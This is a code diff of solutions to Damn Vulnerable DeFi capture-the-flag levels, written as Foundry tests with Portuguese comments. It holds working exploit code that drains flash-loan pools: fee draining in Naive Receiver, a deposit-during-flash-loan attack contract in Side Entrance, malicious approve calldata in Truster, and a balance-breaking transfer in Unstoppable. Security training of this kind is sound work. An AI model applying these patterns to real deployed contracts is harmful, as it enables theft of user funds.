NewBranch

test/Levels/naive-receiver/NaiveReceiver.t.sol

@@ -48,7 +48,10 @@ contract NaiveReceiver is Test {
         /**
          * EXPLOIT START *
          */
-
+        // 1. esgotar o saldo do contrato FlashLoanReceiver, podemos usar fees
+        while (address(flashLoanReceiver).balance > 0) {
+        naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), 1);
+        }
         /**
          * EXPLOIT END *
          */

test/Levels/side-entrance/AttackerContract.sol

@@ -0,0 +1,51 @@
+// Layout of Contract:
+// version
+// imports
+// errors
+// interfaces, libraries, contracts
+// Type declarations
+// State variables
+// Events
+// Modifiers
+// Functions
+// Layout of Functions:
+// constructor
+// receive function (if exists)
+// fallback function (if exists)
+// external
+// public
+// internal
+// private
+// internal & private view & pure functions
+// external & public view & pure functions
+
+// SPDX-License-Identifier: SEE LICENSE IN LICENSE
+pragma solidity 0.8.17;
+
+// Imports
+import {Utilities} from "../../utils/Utilities.sol";
+import {Address} from "openzeppelin-contracts/utils/Address.sol";
+import "forge-std/Test.sol";
+import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {IFlashLoanEtherReceiver} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+
+import {SideEntrance} from "./SideEntrance.t.sol";
+// contract
+
+contract Attack is IFlashLoanEtherReceiver{
+    SideEntranceLenderPool private immutable sideEntrance;
+    using Address for address payable;
+    constructor(address _sideEntrance){
+        sideEntrance = SideEntranceLenderPool(_sideEntrance);
+    }
+    function execute() external payable{
+        sideEntrance.deposit{value:msg.value}();
+    }
+
+    function attack() external{
+        sideEntrance.flashLoan(address(sideEntrance).balance);
+        sideEntrance.withdraw();
+        payable(msg.sender).sendValue(address(this).balance);
+    }
+     receive() external payable {}
+}

test/Levels/side-entrance/SideEntrance.t.sol

@@ -3,8 +3,8 @@ pragma solidity >=0.8.0;
 
 import {Utilities} from "../../utils/Utilities.sol";
 import "forge-std/Test.sol";
-
 import {SideEntranceLenderPool} from "../../../src/Contracts/side-entrance/SideEntranceLenderPool.sol";
+import {Attack} from "./AttackerContract.sol";
 
 contract SideEntrance is Test {
     uint256 internal constant ETHER_IN_POOL = 1_000e18;
@@ -36,6 +36,12 @@ contract SideEntrance is Test {
         /**
          * EXPLOIT START *
          */
+        // usar o eth transferido para retirar mais eth do contrato
+        // 1. impletar o ataque
+        vm.startPrank(attacker);
+        Attack attack_contract = new Attack(address(sideEntranceLenderPool));
+        attack_contract.attack();
+        vm.stopPrank();
 
         /**
          * EXPLOIT END *

test/Levels/truster/Truster.t.sol

@@ -41,6 +41,23 @@ contract Truster is Test {
         /**
          * EXPLOIT START *
          */
+        // 1. Criar o approve
+        bytes memory data = abi.encodeWithSignature(
+        "approve(address,uint256)",
+        attacker,
+        TOKENS_IN_POOL
+        );
+
+        trusterLenderPool.flashLoan(0, attacker, address(dvt), data);
+
+        // 2. ver o allowance
+        uint256 allowance = dvt.allowance(address(trusterLenderPool), attacker);
+        console.log("Allowance after approve:", allowance);
+
+        // 3. executar a transferência
+        vm.startPrank(attacker);
+        dvt.transferFrom(address(trusterLenderPool), attacker, TOKENS_IN_POOL);
+        vm.stopPrank();
 
         /**
          * EXPLOIT END *

test/Levels/unstoppable/Unstoppable.t.sol

@@ -2,7 +2,7 @@
 pragma solidity >=0.8.0;
 
 import {Utilities} from "../../utils/Utilities.sol";
-import "forge-std/Test.sol";
+import "../../../lib/forge-std/src/Test.sol";
 
 import {DamnValuableToken} from "../../../src/Contracts/DamnValuableToken.sol";
 import {UnstoppableLender} from "../../../src/Contracts/unstoppable/UnstoppableLender.sol";
@@ -60,6 +60,8 @@ contract Unstoppable is Test {
         /**
          * EXPLOIT START *
          */
+        //1. colocar fundos no contrato unstoppableLender para quebrar a validação
+        dvt.transfer(address(unstoppableLender), 1);
         /**
          * EXPLOIT END *
          */